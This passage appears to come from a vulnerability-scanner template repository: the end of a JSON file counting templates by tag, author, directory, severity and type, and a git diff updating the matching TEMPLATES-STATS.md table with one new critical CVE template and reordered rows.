nc","count":1},{"name":"jsp","count":1},{"name":"xdcms","count":1},{"name":"bookstack","count":1},{"name":"htmli","count":1},{"name":"plone","count":1},{"name":"akamai","count":1},{"name":"trilithic","count":1},{"name":"nps","count":1},{"name":"zend","count":1},{"name":"panos","count":1},{"name":"zm","count":1},{"name":"aspnuke","count":1},{"name":"soar","count":1},{"name":"livezilla","count":1},{"name":"finereport","count":1},{"name":"sprintful","count":1},{"name":"beanshell","count":1},{"name":"netis","count":1},{"name":"rabbitmq","count":1},{"name":"primetek","count":1},{"name":"avalanche","count":1},{"name":"comodo","count":1},{"name":"gloo","count":1},{"name":"haproxy","count":1},{"name":"firebase","count":1},{"name":"commscope","count":1},{"name":"accela","count":1},{"name":"clusterengine","count":1},{"name":"horde","count":1},{"name":"tongda","count":1},{"name":"kubeflow","count":1},{"name":"optiLink","count":1},{"name":"xff","count":1},{"name":"jenkin","count":1},{"name":"fastcgi","count":1},{"name":"gitlist","count":1},{"name":"stem","count":1},{"name":"setup","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"zimbra","count":1},{"name":"rsyncd","count":1},{"name":"krweb","count":1},{"name":"mariadb","count":1},{"name":"opm","count":1},{"name":"k8","count":1},{"name":"openrestry","count":1},{"name":"node-red-dashboard","count":1},{"name":"szhe","count":1},{"name":"sqlite","count":1},{"name":"springframework","count":1},{"name":"lighttpd","count":1},{"name":"jenzabar","count":1},{"name":"cocoon","count":1},{"name":"ricoh","count":1},{"name":"nuuo","count":1},{"name":"cloudinary","count":1},{"name":"moin","count":1},{"name":"uwsgi","count":1},{"name":"octobercms","count":1},{"name":"pulsesecure","count":1},{"name":"webmin","count":1},{"name":"netrc","count":1},{"name":"chevereto","count":1},{"name":"mantisbt","count":1},{"name":"diris","count":1},{"name":"apos","count":1},{"name":"eyou","count":1},{"name":"plugin","count":1},{"name":"klog","count":1},{"name":"grails","count":1},{"name":"glances","count":1},{"name":"fastapi","count":1},{"name":"nomad","count":1},{"name":"moinmoin","count":1},{"name":"swagger","count":1},{"name":"ns","count":1},{"name":"ntopng","count":1},{"name":"mongo","count":1},{"name":"javafaces","count":1},{"name":"netsweeper","count":1},{"name":"rdp","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"sentry","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"wmt","count":1},{"name":"timesheet","count":1},{"name":"ssltls","count":1},{"name":"cse","count":1},{"name":"acme","count":1},{"name":"starttls","count":1},{"name":"selea","count":1},{"name":"visionhub","count":1},{"name":"kafdrop","count":1},{"name":"skywalking","count":1},{"name":"proftpd","count":1},{"name":"dotnet","count":1},{"name":"spectracom","count":1},{"name":"nexusdb","count":1},{"name":"addpac","count":1},{"name":"hiboss","count":1},{"name":"centos","count":1},{"name":"varnish","count":1},{"name":"domxss","count":1},{"name":"xiuno","count":1},{"name":"glpi","count":1},{"name":"status","count":1},{"name":"alibaba","count":1},{"name":"fedora","count":1},{"name":"hortonworks","count":1},{"name":"monitorix","count":1},{"name":"chinaunicom","count":1},{"name":"mysql","count":1},{"name":"vscode","count":1},{"name":"webadmin","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"wifisky","count":1},{"name":"expressjs","count":1},{"name":"webmodule-ee","count":1},{"name":"dlogin","count":1},{"name":"ganglia","count":1},{"name":"nordex","count":1},{"name":"shopware","count":1},{"name":"pacsone","count":1},{"name":"zeroshell","count":1},{"name":"javascript","count":1},{"name":"jsf","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"kyan","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"vsftpd","count":1},{"name":"fortigate","count":1},{"name":"oscommerce","count":1},{"name":"eprints","count":1},{"name":"sco","count":1},{"name":"feifeicms","count":1},{"name":"sceditor","count":1},{"name":"linkedin","count":1},{"name":"pgadmin","count":1},{"name":"sitecore","count":1},{"name":"servicedesk","count":1},{"name":"weiphp","count":1},{"name":"zenario","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"subrion","count":1},{"name":"iptime","count":1},{"name":"wso2","count":1},{"name":"tpshop","count":1},{"name":"seacms","count":1},{"name":"acexy","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"arl","count":1},{"name":"goahead","count":1},{"name":"fortilogger","count":1},{"name":"cve2005","count":1},{"name":"jfrog","count":1},{"name":"parentlink","count":1},{"name":"zcms","count":1},{"name":"mobileiron","count":1},{"name":"upload","count":1},{"name":"discord","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"synnefo","count":1},{"name":"traefik","count":1},{"name":"shopxo","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"zte","count":1},{"name":"fortinet","count":1},{"name":"email","count":1},{"name":"robomongo","count":1},{"name":"portainer","count":1},{"name":"rmi","count":1},{"name":"tamronos","count":1},{"name":"extractor","count":1},{"name":"mantis","count":1},{"name":"tensorflow","count":1},{"name":"rfi","count":1},{"name":"faraday","count":1},{"name":"vnc","count":1},{"name":"tensorboard","count":1},{"name":"spidercontrol","count":1},{"name":"svn","count":1},{"name":"redhat","count":1},{"name":"bedita","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"sangfor","count":1},{"name":"turbocrm","count":1},{"name":"zmanda","count":1},{"name":"zookeeper","count":1},{"name":"etouch","count":1},{"name":"rhymix","count":1},{"name":"tika","count":1},{"name":"nedi","count":1},{"name":"cors","count":1},{"name":"liferay","count":1},{"name":"phalcon","count":1},{"name":"opentsdb","count":1},{"name":"nette","count":1},{"name":"bitly","count":1},{"name":"expose","count":1},{"name":"npm","count":1},{"name":"doh","count":1},{"name":"openerp","count":1},{"name":"ems","count":1},{"name":"ulterius","count":1},{"name":"mara","count":1},{"name":"phpunit","count":1},{"name":"geddy","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"woocomernce","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"memcached","count":1},{"name":"circontrol","count":1},{"name":"dompdf","count":1},{"name":"openstack","count":1},{"name":"maccmsv10","count":1},{"name":"scimono","count":1},{"name":"redwood","count":1},{"name":"harbor","count":1},{"name":"pagespeed","count":1},{"name":"enumeration","count":1},{"name":"wuzhicms","count":1},{"name":"smartsense","count":1},{"name":"biometrics","count":1},{"name":"manageengine","count":1},{"name":"lansweeper","count":1},{"name":"saltapi","count":1},{"name":"gogs","count":1},{"name":"magicflow","count":1},{"name":"xml","count":1},{"name":"labtech","count":1},{"name":"circontrorl","count":1},{"name":"upnp","count":1},{"name":"opensmtpd","count":1},{"name":"embedthis","count":1},{"name":"wavlink","count":1},{"name":"csrf","count":1},{"name":"lancom","count":1},{"name":"scs","count":1},{"name":"lutron","count":1},{"name":"h3c-imc","count":1},{"name":"calendarix","count":1},{"name":"aura","count":1},{"name":"wavemaker","count":1},{"name":"kerbynet","count":1},{"name":"servicenow","count":1},{"name":"plastic","count":1},{"name":"drone","count":1},{"name":"dvwa","count":1},{"name":"crm","count":1},{"name":"expn","count":1},{"name":"jitsi","count":1},{"name":"xunchi","count":1},{"name":"flink","count":1},{"name":"db","count":1},{"name":"ilo4","count":1},{"name":"tenda","count":1},{"name":"websvn","count":1},{"name":"gridx","count":1},{"name":"anchorcms","count":1},{"name":"apiman","count":1},{"name":"bash","count":1},{"name":"exacqvision","count":1},{"name":"grav","count":1},{"name":"jquery","count":1},{"name":"dvr","count":1},{"name":"duomicms","count":1},{"name":"alertmanager","count":1},{"name":"myucms","count":1},{"name":"tapestry","count":1},{"name":"codemeter","count":1},{"name":"ecom","count":1},{"name":"wazuh","count":1},{"name":"xmlchart","count":1},{"name":"azure","count":1},{"name":"gateone","count":1},{"name":"octoprint","count":1},{"name":"salesforce","count":1},{"name":"javamelody","count":1},{"name":"phpinfo","count":1},{"name":"axis","count":1},{"name":"mpsec","count":1},{"name":"appweb","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"sarg","count":1},{"name":"fortigates","count":1},{"name":"thinkadmin","count":1},{"name":"itop","count":1},{"name":"blind","count":1},{"name":"symfony","count":1},{"name":"zarafa","count":1},{"name":"razor","count":1},{"name":"jmx","count":1},{"name":"mailchimp","count":1},{"name":"74cms","count":1},{"name":"enum","count":1},{"name":"netdata","count":1},{"name":"k8s","count":1},{"name":"st","count":1},{"name":"blue-ocean","count":1},{"name":"vsphere","count":1},{"name":"mcafee","count":1},{"name":"triconsole","count":1},{"name":"blackboard","count":1},{"name":"wooyun","count":1},{"name":"clockwatch","count":1},{"name":"realteo","count":1},{"name":"plc","count":1},{"name":"pyramid","count":1},{"name":"rmc","count":1},{"name":"adminer","count":1},{"name":"darkstat","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"ioncube","count":1},{"name":"nc2","count":1},{"name":"webui","count":1},{"name":"powercreator","count":1},{"name":"opensns","count":1},{"name":"ec2","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":49},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"philippedelteil","count":14},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"nadino","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"hackergautam","count":8},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"pentest_swissky","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"meme-lord","count":4},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"fyoorer","count":3},{"name":"thomas_from_offensity","count":3},{"name":"tess","count":3},{"name":"z3bd","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"manas_harsh","count":2},{"name":"lotusdll","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"randomrobbie","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"hetroublemakr","count":2},{"name":"foulenzer","count":2},{"name":"shifacyclewala","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xprial","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"nkxxkn","count":2},{"name":"fabaff","count":2},{"name":"amsda","count":2},{"name":"incogbyte","count":2},{"name":"unstabl3","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"x1m_martijn","count":2},{"name":"random-robbie","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"bp0lr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"vzamanillo","count":1},{"name":"akshansh","count":1},{"name":"tirtha_mandal","count":1},{"name":"luci","count":1},{"name":"johnk3r","count":1},{"name":"akash.c","count":1},{"name":"thezakman","count":1},{"name":"s1r1u5_","count":1},{"name":"vsh00t","count":1},{"name":"sullo","count":1},{"name":"blckraven","count":1},{"name":"c3l3si4n","count":1},{"name":"smaranchand","count":1},{"name":"mohammedsaneem","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dogasantos","count":1},{"name":"shelld3v","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"un-fmunozs","count":1},{"name":"b0yd","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ipanda","count":1},{"name":"0xtavian","count":1},{"name":"bernardofsr","count":1},{"name":"jteles","count":1},{"name":"ohlinge","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"andysvints","count":1},{"name":"whynotke","count":1},{"name":"undefl0w","count":1},{"name":"johnjhacking","count":1},{"name":"gboddin","count":1},{"name":"gal nagli","count":1},{"name":"0xrod","count":1},{"name":"fopina","count":1},{"name":"andirrahmani1","count":1},{"name":"sicksec","count":1},{"name":"makyotox","count":1},{"name":"rojanrijal","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sshell","count":1},{"name":"d0rkerdevil","count":1},{"name":"bjhulst","count":1},{"name":"taielab","count":1},{"name":"mubassirpatel","count":1},{"name":"rtcms","count":1},{"name":"abison_binoy","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"r3naissance","count":1},{"name":"exploitation","count":1},{"name":"b4uh0lz","count":1},{"name":"remonsec","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"shreyapohekar","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"kabirsuda","count":1},{"name":"j33n1k4","count":1},{"name":"arcc","count":1},{"name":"pdp","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"zandros0","count":1},{"name":"affix","count":1},{"name":"nytr0gen","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"dawid czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"ahmed sherif","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"bolli95","count":1},{"name":"berkdusunur","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"mhdsamx","count":1},{"name":"divya_mudgal","count":1},{"name":"omarkurt","count":1},{"name":"ajaysenr","count":1},{"name":"becivells","count":1},{"name":"toufik airane","count":1},{"name":"furkansenan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kurohost","count":1},{"name":"mah3sec_","count":1},{"name":"ringo","count":1},{"name":"schniggie","count":1},{"name":"streetofhackerr007","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"retr0","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"hanlaomo","count":1},{"name":"sy3omda","count":1},{"name":"pudsec","count":1},{"name":"hakluke","count":1},{"name":"bad5ect0r","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"naglinagli","count":1},{"name":"alifathi-h1","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"soyelmago","count":1},{"name":"alperenkesk","count":1},{"name":"manuelbua","count":1},{"name":"wabafet","count":1},{"name":"noamrathaus","count":1},{"name":"geraldino2","count":1},{"name":"elmahdi","count":1},{"name":"ldionmarcil","count":1},{"name":"iampritam","count":1},{"name":"shifacyclewla","count":1},{"name":"patralos","count":1},{"name":"yashanand155","count":1},{"name":"sickwell","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yavolo","count":1},{"name":"ooooooo_q","count":1},{"name":"defr0ggy","count":1},{"name":"_c0wb0y_","count":1},{"name":"its0x08","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"co0nan","count":1},{"name":"knassar702","count":1},{"name":"flag007","count":1},{"name":"fmunozs","count":1},{"name":"zhenwarx","count":1},{"name":"alph4byt3","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"juicypotato1","count":1},{"name":"52971","count":1},{"name":"alex","count":1},{"name":"0h1in9e","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ilovebinbash","count":1},{"name":"idealphase","count":1},{"name":"g4l1t0 and @convisoappsec","count":1}],"directory":[{"name":"cves","count":519},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":22},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":202},{"name":"low","count":147}],"types":[{"name":"http","count":1567},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index f99c983619..933dc9f670 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,643 +1,644 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | +| cve2021 | 84 | pussycat0x | 34 | network | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 78 | organiccrap | 24 | iot | 22 | | | | | -| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | -| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | milo2012 | 14 | cnvd | 9 | | | | | -| token | 63 | philippedelteil | 14 | headless | 5 | | | | | +| takeover | 72 | 0x_akoko | 20 | dns | 10 | | | | | +| cve2018 | 66 | sheikhrishad | 15 | fuzzing | 10 | | | | | +| | 66 | philippedelteil | 14 | cnvd | 9 | | | | | +| token | 63 | milo2012 | 14 | headless | 5 | | | | | | apache | 61 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | | default-login | 50 | techbrunchfr | 13 | | | | | | | -| iot | 43 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | cyllective | 11 | | | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | +| iot | 43 | cyllective | 11 | | | | | | | | file | 42 | random_robbie | 10 | | | | | | | -| unauth | 40 | righettod | 9 | | | | | | | -| network | 35 | wdahlenb | 9 | | | | | | | -| sqli | 34 | hackergautam | 8 | | | | | | | -| oob | 32 | nadino | 8 | | | | | | | -| logs | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | iamthefrogy | 8 | | | | | | | -| workflow | 29 | melbadry9 | 8 | | | | | | | -| ssrf | 27 | that_juan_ | 8 | | | | | | | -| misc | 27 | randomstr1ng | 7 | | | | | | | -| jira | 26 | dr_set | 7 | | | | | | | -| atlassian | 26 | emadshanab | 7 | | | | | | | -| disclosure | 25 | 0x240x23elu | 7 | | | | | | | -| cve2016 | 23 | oppsec | 7 | | | | | | | -| listing | 22 | harshbothra_ | 7 | | | | | | | -| redirect | 20 | techryptic (@tech) | 7 | | | | | | | -| aem | 19 | kophjager007 | 7 | | | | | | | -| cisco | 17 | r3dg33k | 7 | | | | | | | +| unauth | 40 | wdahlenb | 9 | | | | | | | +| network | 35 | righettod | 9 | | | | | | | +| sqli | 34 | aashiq | 8 | | | | | | | +| oob | 33 | hackergautam | 8 | | | | | | | +| oracle | 29 | melbadry9 | 8 | | | | | | | +| logs | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 29 | that_juan_ | 8 | | | | | | | +| misc | 27 | nadino | 8 | | | | | | | +| ssrf | 27 | emadshanab | 7 | | | | | | | +| jira | 26 | harshbothra_ | 7 | | | | | | | +| atlassian | 26 | kophjager007 | 7 | | | | | | | +| disclosure | 25 | techryptic (@tech) | 7 | | | | | | | +| cve2016 | 23 | 0x240x23elu | 7 | | | | | | | +| listing | 22 | r3dg33k | 7 | | | | | | | +| redirect | 20 | randomstr1ng | 7 | | | | | | | +| aem | 19 | oppsec | 7 | | | | | | | +| cisco | 17 | dr_set | 7 | | | | | | | | sap | 16 | puzzlepeaches | 6 | | | | | | | -| debug | 14 | caspergn | 6 | | | | | | | -| misconfig | 13 | __fazal | 6 | | | | | | | -| struts | 13 | yanyun | 5 | | | | | | | -| fuzz | 13 | joanbono | 5 | | | | | | | +| debug | 14 | __fazal | 6 | | | | | | | +| fuzz | 13 | caspergn | 6 | | | | | | | +| misconfig | 13 | pentest_swissky | 5 | | | | | | | | cve2015 | 13 | panch0r3d | 5 | | | | | | | -| adobe | 12 | ganofins | 5 | | | | | | | -| auth-bypass | 12 | pentest_swissky | 5 | | | | | | | -| weblogic | 12 | meme-lord | 4 | | | | | | | -| android | 12 | iamnoooob | 4 | | | | | | | -| dns | 11 | xelkomy | 4 | | | | | | | -| cve2012 | 11 | nodauf | 4 | | | | | | | -| zoho | 11 | elsfa7110 | 4 | | | | | | | -| springboot | 11 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 11 | rootxharsh | 4 | | | | | | | -| cve2014 | 10 | e_schultze_ | 4 | | | | | | | -| devops | 10 | impramodsargar | 3 | | | | | | | -| jenkins | 10 | z3bd | 3 | | | | | | | -| cve2013 | 10 | mavericknerd | 3 | | | | | | | -| php | 10 | binaryfigments | 3 | | | | | | | -| dlink | 10 | tess | 3 | | | | | | | -| magento | 9 | dudez | 3 | | | | | | | -| gitlab | 8 | shine | 3 | | | | | | | -| ftp | 8 | yash anand @yashanand155 | 3 | | | | | | | -| rails | 8 | fyoorer | 3 | | | | | | | -| aws | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | thomas_from_offensity | 3 | | | | | | | -| cnvd | 8 | _generic_human_ | 3 | | | | | | | -| router | 8 | jarijaas | 3 | | | | | | | -| joomla | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | ree4pwn | 2 | | | | | | | -| scada | 7 | joeldeleep | 2 | | | | | | | -| xxe | 7 | 0xsapra | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| coldfusion | 6 | x1m_martijn | 2 | | | | | | | -| jetty | 6 | vavkamil | 2 | | | | | | | -| rconfig | 6 | dheerajmadhukar | 2 | | | | | | | -| google | 6 | amsda | 2 | | | | | | | -| backup | 6 | fabaff | 2 | | | | | | | -| citrix | 6 | 0xrudra | 2 | | | | | | | -| api | 6 | 0xcrypto | 2 | | | | | | | -| cms | 6 | hetroublemakr | 2 | | | | | | | -| lucee | 5 | koti2 | 2 | | | | | | | -| java | 5 | 0xelkomy | 2 | | | | | | | -| dedecms | 5 | davidmckennirey | 2 | | | | | | | -| ruijie | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 5 | bp0lr | 2 | | | | | | | -| django | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | nkxxkn | 2 | | | | | | | -| circarlife | 5 | bing0o | 2 | | | | | | | -| ibm | 5 | bsysop | 2 | | | | | | | -| ssti | 5 | ehsahil | 2 | | | | | | | -| confluence | 5 | gevakun | 2 | | | | | | | -| cve2009 | 5 | lotusdll | 2 | | | | | | | -| netgear | 5 | lu4nx | 2 | | | | | | | -| login | 5 | random-robbie | 2 | | | | | | | -| headless | 5 | randomrobbie | 2 | | | | | | | -| laravel | 5 | manas_harsh | 2 | | | | | | | -| solr | 5 | moritz nentwig | 2 | | | | | | | -| iis | 5 | unstabl3 | 2 | | | | | | | -| phpmyadmin | 5 | afaq | 2 | | | | | | | -| files | 5 | pxmme1337 | 2 | | | | | | | -| thinkphp | 4 | 0xprial | 2 | | | | | | | -| hongdian | 4 | emenalf | 2 | | | | | | | -| solarwinds | 4 | zomsop82 | 2 | | | | | | | -| magmi | 4 | shifacyclewala | 2 | | | | | | | -| tomcat | 4 | w4cky_ | 2 | | | | | | | -| samsung | 4 | foulenzer | 2 | | | | | | | -| jolokia | 4 | swissky | 2 | | | | | | | -| webserver | 4 | kiblyn11 | 2 | | | | | | | -| elastic | 4 | thevillagehacker | 1 | | | | | | | -| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| struts | 13 | ganofins | 5 | | | | | | | +| adobe | 12 | yanyun | 5 | | | | | | | +| android | 12 | joanbono | 5 | | | | | | | +| weblogic | 12 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 12 | elsfa7110 | 4 | | | | | | | +| cve2011 | 11 | e_schultze_ | 4 | | | | | | | +| cve2012 | 11 | rootxharsh | 4 | | | | | | | +| dns | 11 | meme-lord | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | xelkomy | 4 | | | | | | | +| php | 10 | iamnoooob | 4 | | | | | | | +| cve2013 | 10 | 0w4ys | 3 | | | | | | | +| dlink | 10 | z3bd | 3 | | | | | | | +| devops | 10 | fyoorer | 3 | | | | | | | +| cve2014 | 10 | impramodsargar | 3 | | | | | | | +| jenkins | 10 | yash anand @yashanand155 | 3 | | | | | | | +| magento | 9 | binaryfigments | 3 | | | | | | | +| router | 8 | _generic_human_ | 3 | | | | | | | +| ftp | 8 | f1tz | 3 | | | | | | | +| gitlab | 8 | dudez | 3 | | | | | | | +| aws | 8 | jarijaas | 3 | | | | | | | +| airflow | 8 | tess | 3 | | | | | | | +| rails | 8 | shine | 3 | | | | | | | +| cnvd | 8 | thomas_from_offensity | 3 | | | | | | | +| joomla | 7 | mavericknerd | 3 | | | | | | | +| scada | 7 | manas_harsh | 2 | | | | | | | +| nginx | 7 | 0xprial | 2 | | | | | | | +| vmware | 7 | bing0o | 2 | | | | | | | +| xxe | 7 | 0xcrypto | 2 | | | | | | | +| cms | 6 | bp0lr | 2 | | | | | | | +| citrix | 6 | amsda | 2 | | | | | | | +| rconfig | 6 | 0xrudra | 2 | | | | | | | +| jetty | 6 | random-robbie | 2 | | | | | | | +| google | 6 | vavkamil | 2 | | | | | | | +| api | 6 | pxmme1337 | 2 | | | | | | | +| coldfusion | 6 | dheerajmadhukar | 2 | | | | | | | +| backup | 6 | lotusdll | 2 | | | | | | | +| java | 5 | fabaff | 2 | | | | | | | +| confluence | 5 | joeldeleep | 2 | | | | | | | +| ssti | 5 | gevakun | 2 | | | | | | | +| files | 5 | koti2 | 2 | | | | | | | +| cve2009 | 5 | unstabl3 | 2 | | | | | | | +| headless | 5 | shifacyclewala | 2 | | | | | | | +| dell | 5 | moritz nentwig | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| ruijie | 5 | nkxxkn | 2 | | | | | | | +| login | 5 | emenalf | 2 | | | | | | | +| django | 5 | hetroublemakr | 2 | | | | | | | +| iis | 5 | bsysop | 2 | | | | | | | +| solr | 5 | zomsop82 | 2 | | | | | | | +| drupal | 5 | afaq | 2 | | | | | | | +| netgear | 5 | randomrobbie | 2 | | | | | | | +| dedecms | 5 | 0xelkomy | 2 | | | | | | | +| laravel | 5 | ree4pwn | 2 | | | | | | | +| circarlife | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| ibm | 5 | davidmckennirey | 2 | | | | | | | +| lucee | 5 | incogbyte | 2 | | | | | | | +| webserver | 4 | lu4nx | 2 | | | | | | | +| thinkcmf | 4 | w4cky_ | 2 | | | | | | | +| artifactory | 4 | 0xsapra | 2 | | | | | | | +| tomcat | 4 | udit_thakkur | 2 | | | | | | | +| nodejs | 4 | swissky | 2 | | | | | | | +| vpn | 4 | x1m_martijn | 2 | | | | | | | +| moodle | 4 | foulenzer | 2 | | | | | | | +| traversal | 4 | ehsahil | 2 | | | | | | | 